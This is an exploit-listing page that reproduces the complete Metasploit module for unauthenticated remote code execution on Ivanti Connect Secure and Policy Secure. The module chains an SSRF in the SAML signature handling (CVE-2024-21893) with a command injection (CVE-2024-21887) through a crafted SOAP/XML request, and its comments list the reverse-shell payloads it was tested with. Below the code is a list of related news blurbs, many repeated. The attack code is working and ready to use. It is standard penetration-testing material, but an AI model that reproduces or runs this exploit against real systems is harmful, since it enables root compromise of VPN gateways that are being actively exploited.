Headline
Ivanti Connect Secure Unauthenticated Remote Code Execution
This Metasploit module chains a server side request forgery (SSRF) vulnerability (CVE-2024-21893) and a command injection vulnerability (CVE-2024-21887) to exploit vulnerable instances of either Ivanti Connect Secure or Ivanti Policy Secure, to achieve unauthenticated remote code execution. All currently supported versions 9.x and 22.x are vulnerable, prior to the vendor patch released on Feb 1, 2024. It is unknown if unsupported versions 8.x and below are also vulnerable.
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Ivanti Connect Secure Unauthenticated Remote Code Execution', 'Description' => %q{ This module chains a server side request forgery (SSRF) vulnerability (CVE-2024-21893) and a command injection vulnerability (CVE-2024-21887) to exploit vulnerable instances of either Ivanti Connect Secure or Ivanti Policy Secure, to achieve unauthenticated remote code execution. All currently supported versions 9.x and 22.x are vulnerable, prior to the vendor patch released on Feb 1, 2024. It is unknown if unsupported versions 8.x and below are also vulnerable. }, 'License' => MSF_LICENSE, 'Author' => [ 'sfewer-r7', # MSF Exploit & Rapid7 Analysis ], 'References' => [ ['CVE', '2024-21893'], # The SSRF as Ivanti reported it, but it is actually an existing vuln in the library xmltooling. ['CVE', '2023-36661'], # The original SSRF CVE id in xmltooling, as disclosed by Shibboleth. ['CVE', '2024-21887'], # The command injection vulnerability (Ivanti grouped several under one CVE). ['URL', 'https://attackerkb.com/topics/FGlK1TVnB2/cve-2024-21893/rapid7-analysis'], # Rapid7 Analysis of CVE-2024-21893 ['URL', 'https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis'], # Rapid7 Analysis of CVE-2024-21887 ['URL', 'https://forums.ivanti.com/s/article/CVE-2024-21888-Privilege-Escalation-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure'], ['URL', 'https://shibboleth.net/community/advisories/secadv_20230612.txt'] ], 'DisclosureDate' => '2024-01-31', 'Platform' => %w[linux unix], 'Arch' => [ARCH_CMD], 'Privileged' => true, # Code execution as root. 'Targets' => [ # Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads: # cmd/linux/http/x64/meterpreter/reverse_tcp # cmd/linux/http/x64/shell/reverse_tcp # cmd/linux/http/x86/shell/reverse_tcp # cmd/unix/python/meterpreter/reverse_tcp # cmd/unix/reverse_bash # cmd/unix/reverse_python ['Automatic', {}] ], 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true, 'FETCH_WRITABLE_DIR' => '/tmp' }, 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS] } ) ) end def check # We get a static resource that contains an old banner circa 2018. The product "Connect Secure" was acquired by # Ivanti when Ivanti acquired "Pulse Secure", so we look for this string. This lets us confirm the target is running # the product "Connect Secure" (Tested against 22.3R1). We do not have an unauthenticated method to get a version # number, so this check routine can only return either Detected or Unknown. # This exploit chain based on CVE-2024-21893 bypasses a mitigation for an earlier exploit chain, based upon # CVE-2023-46805. Therefore, we dont leverage CVE-2023-46805 to access the /api/v1/system/system-information # endpoint for version information, as we assume the target has the first Ivanti mitigation applied. If the target # has not had the first mitigation applied, then the exploit ivanti_connect_secure_rce_cve_2023_46805 will work. res = send_request_cgi( 'method' => 'GET', 'uri' => '/dana-na/css/visibility.css' ) return CheckCode::Unknown('Connection failed') unless res return CheckCode::Safe if res.code != 200 if res.body.include? 'Pulse Secure' return CheckCode::Detected end Exploit::CheckCode::Unknown end def exploit # The SSRF URL we use targets a Python backend service bound to 127.0.0.1:8090. This backend service is vulnerable # to an unauthenticated command injection vulnerability (CVE-2024-21887). # Note: Ivanti grouped multiple command injection vulnerabilities into CVE-2024-21887. We choose one that can be # triggered via a single HTTP GET request, as this is what the SSRF gives us (i.e. The SSRF does not perform a POST # request). ssrf_url = "http://127.0.0.1:8090/api/v1/license/keys-status/#{Rex::Text.uri_encode(";#{payload.encoded} #")}" # CVE-2024-21893 is an SSRF in the xmltooling library when processing a Signature with a KeyInfo element. The # KeyInfo element can have a RetrievalMethod element with a URI attribute that points to a remote resource. The # xmltooling library will perform a HTTP GET request to this URI, giving us an SSRF exploit primitive. # While Ivanti reported this as CVE-2024-21893, it is actually CVE-2023-36661 and was patched by the upstream vendor # several months prior to being exploited in the wild in Ivanti Connect Secure. xml_data = %(<?xml version="1.0" encoding="UTF-8"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <ds:SignatureValue>#{Rex::Text.rand_text_hex(20)}</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="#{ssrf_url}"/> <ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body> </soap:Envelope>) send_request_cgi( 'method' => 'POST', 'uri' => '/dana-ws/saml20.ws', 'ctype' => 'text/xml', 'data' => xml_data ) endend
Related news
A newly disclosed critical security flaw impacting Progress Software MOVEit Transfer is already seeing exploitation attempts in the wild shortly after details of the bug were publicly disclosed. The vulnerability, tracked as CVE-2024-5806 (CVSS score: 9.1), concerns an authentication bypass that impacts the following versions - From 2023.0.0 before 2023.0.11 From 2023.1.0 before 2023.1.6, and&
An unknown adversary compromised a CISA app containing the data via a vulnerability in the Ivanti Connect Secure appliance this January.
By Deeba Ahmed Patch Now! One-Day Vulnerabilities Exploited by Magnet Goblin to Deliver Linux Malware! This is a post from HackRead.com Read the original post: Magnet Goblin Hackers Using Ivanti Flaws to Deploy Linux Malware
Hello everyone! In this episode, I will talk about the February updates of my open source projects, also about projects at my main job at Positive Technologies and interesting vulnerabilities. Alternative video link (for Russia): https://vk.com/video-149273431_456239140 Let’s start with my open source projects. Vulremi A simple vulnerability remediation utility, Vulremi, now has a logo and […]
Plus: Mozilla patches 12 flaws in Firefox, Zoom fixes seven vulnerabilities, and more critical updates from February.
By Deeba Ahmed Ivanti has released patches for vulnerabilities found in its enterprise VPN appliances, including two flagged as exploited zero-days… This is a post from HackRead.com Read the original post: Ivanti VPN Flaws Exploited by DSLog Backdoor and Crypto Miners
By Deeba Ahmed Ivanti has released patches for vulnerabilities found in its enterprise VPN appliances, including two flagged as exploited zero-days… This is a post from HackRead.com Read the original post: Ivanti VPN Flaws Exploited by DSLog Backdoor and Crypto Miners
Ivanti has alerted customers of yet another high-severity security flaw in its Connect Secure, Policy Secure, and ZTA gateway devices that could allow attackers to bypass authentication. The issue, tracked as CVE-2024-22024, is rated 8.3 out of 10 on the CVSS scoring system. "An XML external entity or XXE vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x), Ivanti
Ivanti has alerted customers of yet another high-severity security flaw in its Connect Secure, Policy Secure, and ZTA gateway devices that could allow attackers to bypass authentication. The issue, tracked as CVE-2024-22024, is rated 8.3 out of 10 on the CVSS scoring system. "An XML external entity or XXE vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x), Ivanti
For their part, the U.S. did roll out new restrictions on the visas of any foreign individuals who misuse commercial spyware.
By Deeba Ahmed Zero-Day Nightmare: CVE-2024-21893 Exploits Surge in Attacks on Ivanti Products. This is a post from HackRead.com Read the original post: Chained Exploits, Stolen VPN Access: Hackers Target Ivanti Users Despite Patches
By Deeba Ahmed Zero-Day Nightmare: CVE-2024-21893 Exploits Surge in Attacks on Ivanti Products. This is a post from HackRead.com Read the original post: Chained Exploits, Stolen VPN Access: Hackers Target Ivanti Users Despite Patches
By Deeba Ahmed Zero-Day Nightmare: CVE-2024-21893 Exploits Surge in Attacks on Ivanti Products. This is a post from HackRead.com Read the original post: Chained Exploits, Stolen VPN Access: Hackers Target Ivanti Users Despite Patches
By Deeba Ahmed Zero-Day Nightmare: CVE-2024-21893 Exploits Surge in Attacks on Ivanti Products. This is a post from HackRead.com Read the original post: Chained Exploits, Stolen VPN Access: Hackers Target Ivanti Users Despite Patches
By Deeba Ahmed Zero-Day Nightmare: CVE-2024-21893 Exploits Surge in Attacks on Ivanti Products. This is a post from HackRead.com Read the original post: Chained Exploits, Stolen VPN Access: Hackers Target Ivanti Users Despite Patches
A recently disclosed server-side request forgery (SSRF) vulnerability impacting Ivanti Connect Secure and Policy Secure products has come under mass exploitation. The Shadowserver Foundation said it observed exploitation attempts originating from more than 170 unique IP addresses that aim to establish a reverse shell, among others. The attacks exploit CVE-2024-21893 (CVSS
A recently disclosed server-side request forgery (SSRF) vulnerability impacting Ivanti Connect Secure and Policy Secure products has come under mass exploitation. The Shadowserver Foundation said it observed exploitation attempts originating from more than 170 unique IP addresses that aim to establish a reverse shell, among others. The attacks exploit CVE-2024-21893 (CVSS
CISA has ordered all FCEB agencies to disconnect all instances of Ivanti Connect Secure and Ivanti Policy Secure solution products.
CISA has ordered all FCEB agencies to disconnect all instances of Ivanti Connect Secure and Ivanti Policy Secure solution products.
CISA has ordered all FCEB agencies to disconnect all instances of Ivanti Connect Secure and Ivanti Policy Secure solution products.
CISA has ordered all FCEB agencies to disconnect all instances of Ivanti Connect Secure and Ivanti Policy Secure solution products.
Google-owned Mandiant said it identified new malware employed by a China-nexus espionage threat actor known as UNC5221 and other threat groups during post-exploitation activity targeting Ivanti Connect Secure VPN and Policy Secure devices. This includes custom web shells such as BUSHWALK, CHAINLINE, FRAMESTING, and a variant of LIGHTWIRE. "CHAINLINE is a Python web shell backdoor that is
Google-owned Mandiant said it identified new malware employed by a China-nexus espionage threat actor known as UNC5221 and other threat groups during post-exploitation activity targeting Ivanti Connect Secure VPN and Policy Secure devices. This includes custom web shells such as BUSHWALK, CHAINLINE, FRAMESTING, and a variant of LIGHTWIRE. "CHAINLINE is a Python web shell backdoor that is
Ivanti is alerting of two new high-severity flaws in its Connect Secure and Policy Secure products, one of which is said to have come under targeted exploitation in the wild. The list of vulnerabilities is as follows - CVE-2024-21888 (CVSS score: 8.8) - A privilege escalation vulnerability in the web component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows
Ivanti is alerting of two new high-severity flaws in its Connect Secure and Policy Secure products, one of which is said to have come under targeted exploitation in the wild. The list of vulnerabilities is as follows - CVE-2024-21888 (CVSS score: 8.8) - A privilege escalation vulnerability in the web component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows
Ivanti is alerting of two new high-severity flaws in its Connect Secure and Policy Secure products, one of which is said to have come under targeted exploitation in the wild. The list of vulnerabilities is as follows - CVE-2024-21888 (CVSS score: 8.8) - A privilege escalation vulnerability in the web component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows
Ivanti is alerting of two new high-severity flaws in its Connect Secure and Policy Secure products, one of which is said to have come under targeted exploitation in the wild. The list of vulnerabilities is as follows - CVE-2024-21888 (CVSS score: 8.8) - A privilege escalation vulnerability in the web component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows
This Metasploit module chains an authentication bypass vulnerability and a command injection vulnerability to exploit vulnerable instances of either Ivanti Connect Secure or Ivanti Policy Secure, to achieve unauthenticated remote code execution. All currently supported versions 9.x and 22.x prior to the vendor mitigation are vulnerable. It is unknown if unsupported versions 8.x and below are also vulnerable.
This Metasploit module chains an authentication bypass vulnerability and a command injection vulnerability to exploit vulnerable instances of either Ivanti Connect Secure or Ivanti Policy Secure, to achieve unauthenticated remote code execution. All currently supported versions 9.x and 22.x prior to the vendor mitigation are vulnerable. It is unknown if unsupported versions 8.x and below are also vulnerable.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday issued an emergency directive urging Federal Civilian Executive Branch (FCEB) agencies to implement mitigations against two actively exploited zero-day flaws in Ivanti Connect Secure (ICS) and Ivanti Policy Secure (IPS) products. The development came after the vulnerabilities – an authentication bypass
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday issued an emergency directive urging Federal Civilian Executive Branch (FCEB) agencies to implement mitigations against two actively exploited zero-day flaws in Ivanti Connect Secure (ICS) and Ivanti Policy Secure (IPS) products. The development came after the vulnerabilities – an authentication bypass
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a now-patched critical flaw impacting Ivanti Endpoint Manager Mobile (EPMM) and MobileIron Core to its Known Exploited Vulnerabilities (KEV) catalog, stating it's being actively exploited in the wild. The vulnerability in question is CVE-2023-35082 (CVSS score: 9.8), an authentication bypass
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a now-patched critical flaw impacting Ivanti Endpoint Manager Mobile (EPMM) and MobileIron Core to its Known Exploited Vulnerabilities (KEV) catalog, stating it's being actively exploited in the wild. The vulnerability in question is CVE-2023-35082 (CVSS score: 9.8), an authentication bypass
There are many examples of WiFi-enabled home cameras, assistants and doorbells vulnerable to a wide range of security issues.
There are many examples of WiFi-enabled home cameras, assistants and doorbells vulnerable to a wide range of security issues.
By Deeba Ahmed Another day, another zero-day flaw driving the cybersecurity world crazy. This is a post from HackRead.com Read the original post: Ivanti VPN Zero-Day Flaws Fuel Widespread Cyber Attacks
By Deeba Ahmed Another day, another zero-day flaw driving the cybersecurity world crazy. This is a post from HackRead.com Read the original post: Ivanti VPN Zero-Day Flaws Fuel Widespread Cyber Attacks
Several international security agencies are echoing a warning by Ivanti about actively exploited vulnerabilities in its VPN solution.
Several international security agencies are echoing a warning by Ivanti about actively exploited vulnerabilities in its VPN solution.
A pair of zero-day flaws identified in Ivanti Connect Secure (ICS) and Policy Secure have been chained by suspected China-linked nation-state actors to breach less than 10 customers. Cybersecurity firm Volexity, which identified the activity on the network of one of its customers in the second week of December 2023, attributed it to a hacking group it tracks under the name UTA0178
A pair of zero-day flaws identified in Ivanti Connect Secure (ICS) and Policy Secure have been chained by suspected China-linked nation-state actors to breach less than 10 customers. Cybersecurity firm Volexity, which identified the activity on the network of one of its customers in the second week of December 2023, attributed it to a hacking group it tracks under the name UTA0178
Ubuntu Security Notice 6274-1 - Jurien de Jong discovered that XMLTooling did not properly handle certain KeyInfo element content within an XML signature. An attacker could possibly use this issue to achieve server-side request forgery.
Shibboleth XMLTooling before 3.2.4, as used in OpenSAML and Shibboleth Service Provider, allows SSRF via a crafted KeyInfo element. (This is fixed in, for example, Shibboleth Service Provider 3.4.1.3 on Windows.)